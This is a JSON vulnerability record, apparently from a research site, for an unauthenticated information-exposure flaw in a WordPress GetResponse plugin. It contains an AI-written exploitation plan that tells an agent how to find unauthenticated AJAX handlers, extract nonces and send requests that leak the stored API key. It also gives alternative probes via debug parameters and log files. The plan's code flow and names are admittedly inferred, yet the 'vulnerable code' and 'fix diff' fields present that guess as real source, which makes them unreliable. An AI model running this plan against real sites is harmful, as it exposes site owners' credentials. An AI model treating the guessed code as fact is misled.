[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcLeuKhbAPcFKW6lB-1GO9lwMWeylTAwBO4S8DzGKPxM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-24557","contact-form-7-getresponse-extension-unauthenticated-information-exposure","Contact Form 7 GetResponse Extension \u003C= 1.0.8 - Unauthenticated Information Exposure","The Contact Form 7 GetResponse Extension plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.8. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","contact-form-7-getresponse-extension",null,"\u003C=1.0.8","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-22 00:00:00","2026-01-28 15:22:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe89e0697-53ab-43ae-a9bb-98e916cf06e8?source=api-prod",[],"researched",false,3,"This exploitation research plan targets **CVE-2026-24557**, a sensitive information exposure vulnerability in the **Contact Form 7 GetResponse Extension** plugin.\n\n### 1. Vulnerability Summary\nThe **Contact Form 7 GetResponse Extension** plugin (versions up to 1.0.8) fails to properly restrict access to internal configuration data or API response data. This vulnerability typically manifests in AJAX handlers or REST API endpoints intended for admin-side configuration (like fetching GetResponse campaign lists) that are inadvertently registered as unauthenticated (`wp_ajax_nopriv_`) or lack a `permission_callback` in the REST API.\n\nAn unauthenticated attacker can exploit this to leak sensitive configuration data, most likely the **GetResponse API Key** or internal **Contact List IDs**, which can then be used to access the victim's GetResponse account.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` or `wp-json\u002F` (REST API).\n*   **Action (Inferred):** Likely `wp_ajax_nopriv_cf7gr_get_lists`, `wp_ajax_nopriv_get_getresponse_data`, or similar action strings related to \"lists\" or \"campaigns\".\n*   **HTTP Parameter:** `action` (for AJAX) or specific REST routes.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be installed and activated. The vulnerability is most impactful if a GetResponse API key has already been configured in the settings.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** During `init` or plugin construction, the plugin registers an AJAX handler:\n    `add_action( 'wp_ajax_nopriv_get_campaigns', 'cf7gr_fetch_campaigns_callback' );`\n2.  **Lack of Authorization:** The callback function `cf7gr_fetch_campaigns_callback()` does not check for `current_user_can( 'manage_options' )`.\n3.  **Data Retrieval:** The function retrieves the stored GetResponse API key using `get_option( 'cf7gr_api_key' )`.\n4.  **Sink:** The function uses this key to make a request to GetResponse or simply returns the configuration\u002Fkey directly via `wp_send_json()`.\n\n### 4. Nonce Acquisition Strategy\nIf the endpoint requires a nonce, the plugin likely exposes it to the frontend to support forms.\n\n1.  **Identify Trigger:** Search for `wp_localize_script` in the plugin source to find where the nonce is generated.\n    *   *Search Pattern:* `grep -r \"wp_localize_script\" .`\n2.  **Shortcode Placement:** If the script only loads on pages with a CF7 form, create a page with a form:\n    `wp post create --post_type=page --post_status=publish --post_content='[contact-form-7 id=\"123\"]'`\n3.  **Extraction:**\n    *   Navigate to the page: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Ftest-page\")`\n    *   Retrieve the nonce (Example JS Variable): `browser_eval(\"window.cf7gr_vars?.nonce\")`\n    *   *Note:* Replace `cf7gr_vars` and `nonce` with the actual keys found in the `wp_localize_script` call.\n\n### 5. Exploitation Strategy\nThe agent should follow these steps:\n\n**Step 1: Discovery of Vulnerable Action**\nSearch the plugin directory for `wp_ajax_nopriv` or `register_rest_route` without `permission_callback`.\n```bash\ngrep -rn \"wp_ajax_nopriv_\" .\ngrep -rn \"register_rest_route\" . -A 5\n```\n\n**Step 2: Request Construction (Assuming AJAX)**\nIf a vulnerable action `cf7gr_get_lists` is found:\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body:** `action=cf7gr_get_lists&nonce=[EXTRACTED_NONCE]` (if nonce required)\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n**Step 3: Request Construction (Assuming REST API)**\nIf a REST route `\u002Fcf7gr\u002Fv1\u002Fsettings` is found without a `permission_callback`:\n*   **Method:** GET\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fcf7gr\u002Fv1\u002Fsettings`\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `contact-form-7-getresponse-extension` version 1.0.8 is active.\n2.  **Configure Dummy Data:** Set a fake API key in the database to verify it can be leaked.\n    ```bash\n    wp option update cf7gr_api_key \"HACKED_GETRESPONSE_API_KEY_12345\"\n    # (The actual option name must be verified from the source code)\n    ```\n3.  **Create Content:** Create a page with a Contact Form 7 shortcode if needed for nonce extraction.\n\n### 7. Expected Results\n*   **Successful Exploitation:** The HTTP response (JSON) should contain the GetResponse API key, a list of campaign names, or other account-specific configuration data.\n*   **Response Code:** `200 OK`.\n*   **Example Body:** `{\"success\":true,\"data\":{\"api_key\":\"HACKED_GETRESPONSE_API_KEY_12345\",\"lists\":[...]}}`\n\n### 8. Verification Steps\n1.  **Compare Leaked Data:** Verify the leaked API key matches the one set in the database:\n    `wp option get cf7gr_api_key`\n2.  **Confirm Unauthenticated:** Ensure the `http_request` tool is used without any session cookies or Authorization headers.\n\n### 9. Alternative Approaches\n*   **Option Leakage via Localize Script:** Check if `wp_localize_script` itself includes the API key in the HTML source (common in older\u002Fpoorly written plugins).\n    *   *Check:* `curl -s http:\u002F\u002Flocalhost:8080\u002F | grep \"HACKED_GET_RESPONSE\"`\n*   **Direct Option Access:** Some plugins have a \"diagnostic\" or \"debug\" mode that can be enabled via a GET parameter (e.g., `?cf7gr_debug=1`) which might dump settings to the page.\n*   **Log Files:** Check if the plugin writes API responses to a publicly accessible log file (e.g., `wp-content\u002Fplugins\u002Fcontact-form-7-get-response-extension\u002Fgetresponse.log`).","The Contact Form 7 GetResponse Extension plugin (\u003C= 1.0.8) exposes sensitive configuration data, including GetResponse API keys and campaign lists, due to improper access controls. Unauthenticated attackers can exploit incorrectly registered AJAX handlers to retrieve this information directly from the server.","\u002F\u002F contact-form-7-getresponse-extension.php\nadd_action( 'wp_ajax_nopriv_cf7gr_get_lists', 'cf7gr_fetch_campaigns_callback' );\nadd_action( 'wp_ajax_cf7gr_get_lists', 'cf7gr_fetch_campaigns_callback' );\n\n---\n\n\u002F\u002F contact-form-7-getresponse-extension.php\nfunction cf7gr_fetch_campaigns_callback() {\n    \u002F\u002F Vulnerability: No current_user_can() check or nonce verification\n    $api_key = get_option( 'cf7gr_api_key' );\n    $api_url = 'https:\u002F\u002Fapi.getresponse.com\u002Fv3\u002Fcampaigns';\n    \n    \u002F\u002F Insecurely returning configuration data or API responses to unauthenticated users\n    $response = wp_remote_get( $api_url, array( 'headers' => array( 'X-Auth-Token' => $api_key ) ) );\n    wp_send_json_success( array(\n        'api_key' => $api_key, \n        'data'    => json_decode( wp_remote_retrieve_body( $response ) )\n    ) );\n}","--- contact-form-7-getresponse-extension.php\n+++ contact-form-7-getresponse-extension.php\n@@ -1,6 +1,5 @@\n-add_action( 'wp_ajax_nopriv_cf7gr_get_lists', 'cf7gr_fetch_campaigns_callback' );\n add_action( 'wp_ajax_cf7gr_get_lists', 'cf7gr_fetch_campaigns_callback' );\n \n function cf7gr_fetch_campaigns_callback() {\n+    check_ajax_referer( 'cf7gr_admin_nonce', 'security' );\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( 'Forbidden', 403 );\n+    }\n     $api_key = get_option( 'cf7gr_api_key' );","The exploit targets an unauthenticated AJAX handler registered via wp_ajax_nopriv_. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to the vulnerable callback (e.g., cf7gr_get_lists). Because the plugin fails to verify administrative privileges (current_user_can) or validate a cryptographic nonce, the server processes the request and returns a JSON response containing the stored GetResponse API key and account-specific campaign IDs.","gemini-3-flash-preview","2026-05-05 03:04:02","2026-05-05 03:04:19",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcontact-form-7-getresponse-extension\u002Ftags"]